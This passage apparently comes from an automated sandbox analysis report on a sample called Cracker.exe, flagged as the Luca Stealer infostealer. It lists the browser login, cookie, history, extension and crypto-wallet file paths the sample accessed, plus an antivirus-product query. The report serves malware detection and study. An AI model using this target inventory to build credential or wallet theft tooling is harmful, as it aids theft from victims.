      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Luca Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: Process Memory Space: Cracker.exe PID: 7528, type: MEMORYSTR
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\Data
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\Data
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Wallets\Jaxx\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\xt
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\ux
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\@
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\ux
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\@
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\ux
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\@
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
      Tries to steal Crypto Currency Wallets
